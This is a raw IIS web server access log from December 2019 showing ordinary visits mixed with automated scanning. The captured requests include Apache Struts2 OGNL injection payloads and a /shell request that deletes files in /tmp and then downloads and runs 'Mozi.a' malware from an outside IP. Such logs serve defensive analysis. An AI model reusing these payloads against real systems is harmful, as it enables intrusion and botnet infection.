#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 01:48:29 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 01:48:29 192.168.0.14 POST /editBlackAndWhiteList - 80 - 192.168.0.1 ApiTool - 404 0 2 390 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 03:15:08 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 03:15:08 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 593 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 05:27:43 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 05:27:43 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/68.0.3440.106+Safari/537.36 - 200 0 0 437 2019-12-19 05:27:46 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+HeadlessChrome/78.0.3904.70+Safari/537.36 - 200 0 0 250 2019-12-19 05:27:47 192.168.0.14 GET /iisstart.png - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+HeadlessChrome/78.0.3904.70+Safari/537.36 http://14.139.109.23/ 200 0 0 1015 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 06:05:06 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 06:05:06 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 200 0 0 609 2019-12-19 06:05:08 192.168.0.14 GET /index.action - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 578 2019-12-19 06:05:11 192.168.0.14 GET /login.action - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 421 2019-12-19 06:05:14 192.168.0.14 GET /index.do - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 562 2019-12-19 06:05:18 192.168.0.14 GET /index.jsp - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 531 2019-12-19 06:05:23 192.168.0.14 GET /login.do - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 468 2019-12-19 06:05:28 192.168.0.14 GET /login.jsp - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 625 2019-12-19 06:05:35 192.168.0.14 GET /main.jsp - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 562 2019-12-19 06:05:41 192.168.0.14 GET /default.jsp - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 562 2019-12-19 06:05:46 192.168.0.14 GET /register.jsp - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 562 2019-12-19 06:05:52 192.168.0.14 GET /login/login.jsp - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 484 2019-12-19 06:05:55 192.168.0.14 GET /login/indexAction.action - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 578 2019-12-19 06:05:59 192.168.0.14 GET /indexAction.action - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 0 2 546 2019-12-19 06:06:04 192.168.0.14 POST / - 80 - 192.168.0.1 python-requests/2.12.4 - 405 0 1 328 2019-12-19 06:06:10 192.168.0.14 POST /index.action - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 578 2019-12-19 06:06:16 192.168.0.14 POST /login.action - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 546 2019-12-19 06:06:22 192.168.0.14 POST /index.do - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 531 2019-12-19 06:06:27 192.168.0.14 POST /index.jsp - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 515 2019-12-19 06:06:32 192.168.0.14 POST /login.do - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 636 2019-12-19 06:06:39 192.168.0.14 POST /login.jsp - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 562 2019-12-19 06:06:43 192.168.0.14 POST /main.jsp - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 593 2019-12-19 06:06:49 192.168.0.14 POST /default.jsp - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 578 2019-12-19 06:06:52 192.168.0.14 POST /register.jsp - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 562 2019-12-19 06:06:55 192.168.0.14 POST /login/login.jsp - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 500 2019-12-19 06:06:58 192.168.0.14 POST /login/indexAction.action - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 562 2019-12-19 06:07:01 192.168.0.14 POST /indexAction.action - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 562 2019-12-19 06:07:13 192.168.0.14 POST / - 80 - 192.168.0.1 python-requests/2.12.4 - 405 0 1 343 2019-12-19 06:07:17 192.168.0.14 POST /index.action - 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 531 2019-12-19 06:07:25 192.168.0.14 GET /(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json &obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 515 2019-12-19 06:07:29 192.168.0.14 GET /index.action/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json &obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 609 2019-12-19 06:07:32 192.168.0.14 GET /login.action/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json &obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 531 2019-12-19 06:07:36 192.168.0.14 GET /index.do/(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json &obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f 80 - 192.168.0.1 python-requests/2.12.4 - 404 0 2 593 2019-12-19 06:07:45 192.168.0.14 POST / - 80 - 192.168.0.1 python-requests/2.12.4 - 405 0 1 281 2019-12-19 06:07:55 192.168.0.14 GET / debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest 80 - 192.168.0.1 python-requests/2.12.4 - 200 0 0 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 07:04:30 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 07:04:30 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 1236 13772 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 07:37:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 07:37:38 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 1236 13066 2019-12-19 07:45:25 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 200 0 0 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 08:15:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 08:15:26 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/57.0.2987.133+Safari/537.36 - 200 0 0 515 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 09:00:47 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 09:00:47 192.168.0.14 POST /editBlackAndWhiteList - 80 - 192.168.0.1 ApiTool - 404 0 2 437 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 09:35:50 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 09:35:50 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 10:16:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 10:16:39 192.168.0.14 GET / 0628182016134805143312 80 - 192.168.0.1 - - 200 0 0 500 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 19:32:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 19:32:01 192.168.0.14 GET /shell cd+/tmp;rm+-rf+*;wget+http://49.119.79.18:36441/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 80 - 192.168.0.1 Hello,+world - 404 0 2 750 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 20:31:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 20:31:13 192.168.0.14 GET /TP/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 468 2019-12-19 20:31:13 192.168.0.14 GET /TP/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 382 2019-12-19 20:31:15 192.168.0.14 GET /thinkphp/html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 359 2019-12-19 20:31:15 192.168.0.14 GET /html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 375 2019-12-19 20:31:16 192.168.0.14 GET /public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 390 2019-12-19 20:31:16 192.168.0.14 GET /TP/html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 390 2019-12-19 20:31:18 192.168.0.14 GET /elrekt.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 375 2019-12-19 20:31:18 192.168.0.14 GET /index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 376 2019-12-19 20:31:19 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 200 0 0 500 2019-12-19 20:42:32 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 1236 13268 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 22:23:14 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 22:23:14 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 265 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2019-12-19 23:25:30 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2019-12-19 23:25:30 192.168.0.14 HEAD /robots.txt - 80 - 192.168.0.1 - - 404 0 2 359